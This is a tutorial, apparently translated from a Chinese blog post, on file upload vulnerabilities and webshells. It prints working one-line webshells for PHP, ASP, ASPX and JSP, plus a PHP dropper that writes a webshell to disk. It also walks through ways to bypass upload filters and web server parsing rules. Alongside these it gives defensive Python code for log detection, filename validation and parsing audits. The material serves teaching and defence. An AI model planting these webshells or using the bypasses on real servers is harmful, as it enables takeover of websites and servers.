[Network Security] Detailed Explanation of File Upload Vulnerabilities

File Upload Vulnerability

1. What is a file upload

Client data is packaged as a file and sent to the server over a network protocol. The server parses the data and finally stores it as a real file on the server's hard disk.

With HTTP, a file upload is usually a POST request to the web server. Once the web server receives and accepts the request, the client establishes the connection with it and transmits the data.

2. Why file upload vulnerabilities occur

Server misconfiguration

Upload restrictions bypassed because filtering is lax

File upload vulnerabilities in open-source editors

File parsing vulnerabilities that lead to uploaded files being executed

3. Impact of file upload vulnerabilities

An attacker uploads a malicious file and gets the server to hand it to its interpreter; the malicious code then runs on the server and can perform operations such as running database queries, managing server files and executing commands, eventually taking control of the entire website and server.

Such a malicious file is also known as a WebShell.

Potentially Vulnerable Locations

Image upload function

Avatar upload function

Document upload function

4. WebShell

Overview

A webshell is a command execution environment in the form of a web page written in ASP, JSP, CGI or a similar scripting language; it is also called a web page Trojan backdoor.

Through this web page backdoor, an attacker gains operating privileges on the web server and can use it to upload and download files, read the database, execute commands and so on.

Backdoor

A computer has 65535 ports. Each port is a door the computer opens to communicate with the outside world, and behind each door are services the computer provides. An attacker abuses these services to obtain privileges on the server and leaves a backdoor behind.

Classification
  1. By file size:

    One-line Trojan (yijuhua): usually a single line of code

    Small Trojan (xiaoma): contains only a file upload function

    Large Trojan (dama): contains many functions; its code is usually encrypted and obfuscated

  2. By script type

    jsp

    asp

    aspx

    php

Features
  1. Most webshells appear in the form of dynamic scripts
  2. A webshell is an ASP or PHP Trojan backdoor
  3. A webshell passes through the server's firewall because the data exchanged between the attacker and the controlled server travels over port 80, like ordinary web traffic
  4. A webshell generally leaves no trace in the system log; it only leaves request records in the web server log
Attack process
  1. Exploit a web vulnerability to obtain web privileges
  2. Upload the small Trojan (xiaoma)
  3. Use it to upload the large Trojan (dama)
  4. Invoke the webshell remotely to execute commands
Common webshells

PHP

<?php eval($_GET[pass]);?>
<?php eval($_POST[pass]);?>

pass is the parameter name; after the Trojan is opened, the command to run is supplied in that parameter in the URL:

http.../?pass=phpinfo(); or ?pass=system(ipconfig); and other commands

ASP

<%eval request("pass")%>

ASPX

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"])%>

JSP

<%Runtime.getRuntime().exec(request.getParameter("i"));%>
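
Because, as the features list says, a webshell leaves traces only in the web server log, and because the commands for the one-line Trojan travel in a query parameter (?pass=phpinfo(); above), the access log is where a defender looks for it. The Python detector below is an added example, not code from the original post: it parses combined-format access-log lines and flags requests for script files under the upload directories, as well as parameter values that contain PHP function calls. The upload directory names and the sample log lines are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined/common log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumption: directories where the application stores user uploads.
UPLOAD_DIRS = ("/uploads/", "/upload/", "/avatar/", "/files/")

# A script extension anywhere in the path, including the IIS 6 "xx.asp;.jpg" form
# and the Nginx/IIS 7 "photo.jpg/x.php" form.
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|asp|aspx|jsp)(?=[^a-z0-9]|$)", re.IGNORECASE)

# Parameter values that look like the commands the text shows being passed to the
# one-line Trojan (phpinfo(); system(...); eval(...)).
CODE_IN_PARAM_RE = re.compile(
    r"\b(phpinfo|system|eval|exec|passthru|shell_exec|assert)\s*\(", re.IGNORECASE
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze_line(line):
    """Return the alert reasons for one log line (empty list = nothing suspicious)."""
    fields = parse_line(line)
    if fields is None:
        return []
    reasons = []
    url = urlsplit(fields["target"])
    path = unquote(url.path)
    if path.startswith(UPLOAD_DIRS) and SCRIPT_EXT_RE.search(path):
        reasons.append("script-in-upload-dir")
    for _name, value in parse_qsl(url.query, keep_blank_values=True):
        if CODE_IN_PARAM_RE.search(value):
            reasons.append("code-in-parameter")
            break
    return reasons


def analyze_log(lines):
    """Return one record per suspicious line: {"ip", "target", "reasons"}."""
    alerts = []
    for line in lines:
        reasons = analyze_line(line)
        if reasons:
            fields = parse_line(line)
            alerts.append({"ip": fields["ip"], "target": fields["target"], "reasons": reasons})
    return alerts


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Feb/2023:18:32:30 +0800] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [26/Feb/2023:18:32:41 +0800] "GET /uploads/photo.jpg HTTP/1.1" 200 8831 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Feb/2023:18:33:02 +0800] "GET /uploads/up.php?pass=phpinfo%28%29%3B HTTP/1.1" 200 41233 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Feb/2023:18:33:15 +0800] "POST /uploads/xx.asp;.jpg HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Feb/2023:18:33:40 +0800] "GET /uploads/photo.jpg/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in analyze_log(SAMPLE_LOG):
        print(alert["ip"], alert["target"], ", ".join(alert["reasons"]))
```

The path rule is the high-value one: an application that stores uploads under a fixed prefix should never serve a script extension from there, so any hit is worth an investigation regardless of the query string. The parameter rule is a signature and will miss POST bodies and encrypted traffic (the point made below about Behinder), so it complements rather than replaces file-system monitoring of the upload directory.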

5. Basic principle of a webshell

1. Executable script

    HTTP packet

2. Data transfer

3. Execution of the received data

    Direct execution

    Implementation via file inclusion

    Dynamic function execution

    Callback function

One-line small Trojan (xiaoma)
<?php fputs(fopen("up.php","w"),'<?php eval($_POST["cmd"])?>');?>

This creates a file up.php in the current directory whose content is the PHP one-liner.

Uploading the large Trojan (dama) through the small one

Use a base64 tool to convert the PHP code into a string (it is encoded a second time so that special characters such as + and = are removed).

Create up.php and write the file-upload PHP code into it:

<?php fputs(fopen(base64_decode("dXAucGhw"),"w"),base64_decode(base64_decode("<double-base64-encoded PHP code>")));?>

base64_decode() performs the decoding; dXAucGhw is the base64 encoding of up.php.

The large Trojan can then be imported through the file upload function.

6. WebShell management tools

1. China Chopper (Caidao) (outdated, and known to contain a backdoor)

2. Cknife

3. Weevely3 (included in Kali)

4. AntSword (Chinese Ant Sword)

5. Behinder (Ice Scorpion)

Its data transmission is encrypted, which lets it get past firewall inspection very effectively.

7. File upload detection methods

Client-side JavaScript detection (checks the file extension; front-end detection)

Server-side MIME type detection (checks the Content-Type value)

MIME Reference Manual (w3school.com.cn)

Server-side directory path detection (checks content related to the root path parameter)

Server-side file extension detection (checks the file extension)

Server-side file content detection (checks whether the content is legal, whether it contains malicious code, etc.)

8. Bypass methods

Capture the request with Burp Suite and then modify the file so that it satisfies the server's checks.

Bypassing client-side detection (front-end JavaScript detection)

Principle of client-side detection:

The upload page usually contains JavaScript that checks the file before it is uploaded; most commonly it checks whether the file type and extension are allowed.


Method:

Simply disable JavaScript in the local browser.

This can be done with the NoScript add-on for Firefox, by disabling JS in IE, and so on.


Bypassing server-side detection

Principle of server-side detection:

Server-side code typically checks three things:

MIME type, file extension, file content


File magic number: the first few bytes of a file identify what type of file it is.

Magic numbers by format: File Format and Magic Number

The WinHex tool can be used to view the magic number of a given file.


Bypass methods:

1. Bypassing MIME type detection

Principle:

While an image file is being uploaded, the server checks the value of the Content-Type field in the HTTP request to decide whether the uploaded file is legitimate.

Method:

Intercept the request with Burp Suite and change the Content-Type of the file part to a permitted type.


2. Bypassing file extension detection - blacklist

Principle (blacklist strategy):

Extensions listed in the blacklist are illegal. There is usually a dedicated blacklist containing the common dangerous script extensions.

Method:

  1. Case bypass (.pHp)

    If the extension check compares the strings case-sensitively to decide whether the file is restricted, changing the case of the extension bypasses it.

  2. Trailing space bypass (.php followed by a space)

    If the blacklist check does not trim trailing whitespace from the extension,

    a space appended after the extension bypasses it.

  3. Trailing dot bypass (.php.)

    If the blacklist check does not strip trailing dots from the extension,

    a dot appended to the file name bypasses it, because Windows automatically removes the last dot of a file name.

  4. ::$DATA bypass

    If the blacklist check does not strip ::$DATA,

    appending ::$DATA after the extension bypasses the blacklist detection, using a feature of the NTFS file system under Windows.

    Windows automatically strips ::$DATA when the file is saved.

  5. Combining with Apache parsing behaviour

    Apache parsing has a characteristic:

    Extensions are evaluated from right to left; if an extension is not recognised, the next one to the left is examined.

    For example, for a file aa.php.owf.rar, Apache does not recognise rar or owf, so the file is parsed as PHP.

  6. .htaccess file (distributed configuration file)

    Combined with a blacklist bypass, uploading a custom .htaccess easily bypasses all kinds of detection.

    .htaccess stands for Hypertext Access.

    It provides a way to change the configuration for a single directory.

    When a file is uploaded to the server, the server looks for an .htaccess file and reads and applies its configuration.

    This configuration can be customised so that files bypass detection.


3. Bypassing file extension detection - whitelist

Principle (whitelist strategy):

Any extension that is not in the whitelist is illegal.

Bypass method:

The server checks the file type from back to front, but when saving it reads the file name from front to back.

This can be bypassed with null-byte (00) truncation, either as %00 truncation or as 0x00 truncation.

Example: upload a file named aa.php%00.png

The server checks the file type from the back. When it reads %00 it decodes it to 0x00, and once a 0x00 is present it automatically ignores everything after it.

The file is therefore accepted as a png file, bypassing the whitelist.

When the server saves the file it reads the name from the front, so .png is automatically dropped and the file is saved as a php file.

Note:

In the URL the name appears as aa.php%00.png. In the file name itself, %00 must be decoded before being inserted into the extension.

To do this with Burp Suite, first insert a space where the %00 is needed, then switch to the HEX view: the space is hex 20, and changing that byte to 00 gives the decoded form of %00.
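
Every bypass in items 1 to 6 of the blacklist section, and the %00 truncation in the whitelist section, works because the check is applied to the raw client-supplied name. The Python validator below is an added example (not code from the original post) showing the defender-side answer: normalise the name first, reject the null byte and the ::$DATA stream outright, compare case-insensitively, refuse a script extension in any position (which also neutralises Apache multi-extension parsing and an uploaded .htaccess), and only then apply a whitelist instead of a blacklist. The allowed-extension set and the random-name policy are assumptions for an image/document upload endpoint.

```python
import os
import secrets

# Assumption: what an image/document upload endpoint is willing to store.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}

# Extensions that must never appear anywhere in a stored name, because Apache's
# multi-extension handling and .htaccess overrides can turn them into code.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "asp", "aspx", "jsp", "htaccess"}


class UploadRejected(ValueError):
    """Raised with the reason an upload name was refused."""


def sanitize_filename(client_name: str) -> str:
    """Return a safe server-side filename or raise UploadRejected.

    Each bypass string from the text is neutralised by normalising the name
    *before* the whitelist check rather than by blacklisting individual tricks.
    """
    # 1. Null-byte truncation (aa.php%00.png): after URL decoding the byte is 0x00.
    if "\x00" in client_name:
        raise UploadRejected("null byte in filename")
    # 2. Strip any directory part; an NTFS stream (::$DATA) or drive colon is never legitimate.
    name = os.path.basename(client_name.replace("\\", "/"))
    if ":" in name:
        raise UploadRejected("alternate data stream or drive syntax")
    # 3. Windows drops trailing dots and spaces when saving, so drop them before checking.
    name = name.rstrip(". ")
    if not name or name.startswith("."):
        raise UploadRejected("empty name or dotfile (e.g. .htaccess)")
    # 4. Case-insensitive comparison defeats .pHp.
    parts = name.lower().split(".")
    if len(parts) < 2:
        raise UploadRejected("no extension")
    # 5. Multi-extension names (aa.php.owf.rar, aa.php.jpg): any script extension anywhere is fatal.
    if any(p in SCRIPT_EXTENSIONS for p in parts[1:]):
        raise UploadRejected("script extension present")
    ext = parts[-1]
    # 6. Whitelist, not blacklist: only the final extension decides, and it must be known.
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension .{ext} not allowed")
    # 7. Never reuse the client's base name: random name plus one known extension.
    return f"{secrets.token_hex(16)}.{ext}"


def classify(client_name: str) -> str:
    """Human-readable outcome for a client-supplied name, for logging and testing."""
    try:
        sanitize_filename(client_name)
        return "accepted"
    except UploadRejected as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # Constructed names mirroring the bypass strings discussed in the text.
    for candidate in ["photo.jpg", "shell.pHp", "shell.php ", "shell.php.",
                      "shell.php::$DATA", "aa.php.owf.rar", "aa.php\x00.png", ".htaccess"]:
        print(repr(candidate), "->", classify(candidate))
```

Rejecting the null byte explicitly, rather than relying on the runtime, matters because the %00 trick depended on the language runtime truncating paths at the byte (PHP did so before 5.3.4); a validator should not assume the runtime has been fixed. Storing under a random name also means a successful bypass of some other check still leaves the attacker unable to predict the URL of the stored file.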


4. Bypassing file content detection

Principle:

The content of the uploaded file is generally inspected to decide whether the file is legitimate.

Two detection methods:

Checking the file magic number.

Calling an API or function to load-test the file; the common one is an image rendering test (possibly a secondary rendering test).

Bypass methods:

  1. Bypassing magic number detection

    Prepend the corresponding file magic number to the file.

    For example, to bypass magic number detection for jpg files, prepend FF D8 FF E0 10 4A 46 49 46

  2. Bypassing file loading detection

Render/load test attacks - code injection bypass

Attack principle:

Find a blank area where code can be placed without breaking the rendering of the file itself.

Generally this is the comment area of the image, which keeps the file structure intact.

Attack method against secondary rendering - attacking the file loader itself

Attack principle:

Attack the file loader through an overflow attack.

After the malicious file is uploaded, the server's file loader actively tests it, and the overflow triggered during the loading test executes shellcode.

9. Web server parsing vulnerabilities

Apache parsing vulnerability

Extensions are evaluated from right to left; if an extension is not recognised, the next one to the left is examined.

For example, for a file aa.php.owf.rar, Apache does not recognise rar or owf, so the file is parsed as PHP.

IIS 6.0 parsing vulnerabilities

1. Directory parsing

Form: www.xxx.com/xx.asp/xx.jpg

Principle: by default the server parses every file inside a directory named *.asp as an ASP file.

2. File parsing

Form: www.xxx.com/xx.asp;.jpg

Principle: by default the server does not parse anything after the semicolon, so xx.asp;.jpg is parsed as an ASP file.

IIS 7.0 parsing vulnerability

Form: any file name/any file name.php

Principle: IIS 7.0/7.5 has a parsing vulnerability similar to Nginx when handling PHP.

For any file name, as long as the string "/any file name.php" is appended to the URL, the file is parsed as PHP.

Nginx parsing vulnerability

Form 1: any file name/any file name.php

Principle: appending "/any file name.php" to any file name causes it to be parsed as PHP, for example test.jpg/x.php

Form 2: any file name%00.php

For older Nginx versions, %00.php can be appended to any file name to carry out the parsing attack

(Nginx version <= 0.8.37)
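
The parsing rules in this section decide whether a stored upload is ever handed to a script interpreter, so a defender auditing upload URLs wants one check that applies all of them. The Python function below is an added example, not code from the original post; it models the Apache, IIS 6.0, IIS 7.x/Nginx and old-Nginx rules described above. The Apache rule is applied conservatively: a PHP extension in any position is flagged, which covers the right-to-left case in the text and is the safe assumption for AddHandler-style configurations. The request paths it runs on are constructed for the demonstration.

```python
from urllib.parse import unquote

# Extensions the respective servers hand to a script interpreter.
PHP_EXTS = {"php", "php3", "php4", "php5", "phtml"}
OTHER_SCRIPT_EXTS = {"asp", "aspx", "jsp"}


def would_execute(url_path: str):
    """Return the names of the parsing rules (as described in the text) under which
    a request for url_path would be executed as script rather than served as data.
    An empty list means none of the rules applies."""
    reasons = []
    path = unquote(url_path)

    # Old Nginx (<= 0.8.37): the null byte truncates the real file name while the
    # trailing ".php" still selects the PHP handler (any file name%00.php).
    if "\x00" in path and path.split("\x00", 1)[1].lower().endswith(".php"):
        reasons.append("nginx-null-byte")

    segments = [s for s in path.split("/") if s]
    if not segments:
        return reasons
    *dirs, last = segments

    # IIS 6.0 directory rule: every file under a folder named xx.asp runs as ASP.
    if any(d.lower().endswith(".asp") for d in dirs):
        reasons.append("iis6-directory")

    # IIS 6.0 file rule: the part after ";" is ignored, so xx.asp;.jpg runs as ASP.
    if ";" in last and last.split(";", 1)[0].lower().endswith(".asp"):
        reasons.append("iis6-semicolon")

    exts = last.lower().split(".")[1:]
    if exts and exts[-1] in PHP_EXTS | OTHER_SCRIPT_EXTS:
        reasons.append("direct-script")
        # Nginx / IIS 7.x path-info rule: test.jpg/x.php makes test.jpg run as PHP
        # when the preceding segment looks like a file rather than a directory.
        if dirs and "." in dirs[-1]:
            reasons.append("pathinfo")
    elif any(e in PHP_EXTS for e in exts):
        # Apache multi-extension rule: aa.php.owf.rar is handed to the PHP handler.
        # Applied conservatively: a PHP extension in any position is flagged.
        reasons.append("apache-multi-extension")
    return reasons


# Constructed request paths mirroring the forms given in the text.
SAMPLE_PATHS = [
    "/uploads/photo.jpg",
    "/uploads/aa.php.owf.rar",
    "/uploads/xx.asp/xx.jpg",
    "/uploads/xx.asp;.jpg",
    "/uploads/test.jpg/x.php",
    "/uploads/test.jpg%00.php",
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{p!r:32} {', '.join(would_execute(p)) or 'served as data'}")
```

Run over the paths a web server actually received for the upload prefix, the function turns this section into a concrete audit: any non-empty result on a path under the upload directory is either a server that still has one of these behaviours or an upload name that the validator should have refused. The durable fix on the server side is the same in every case: serve uploads from a location with script execution disabled, so none of the parsing rules has a handler to select.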


Origin blog.csdn.net/love_wgll/article/details/129230797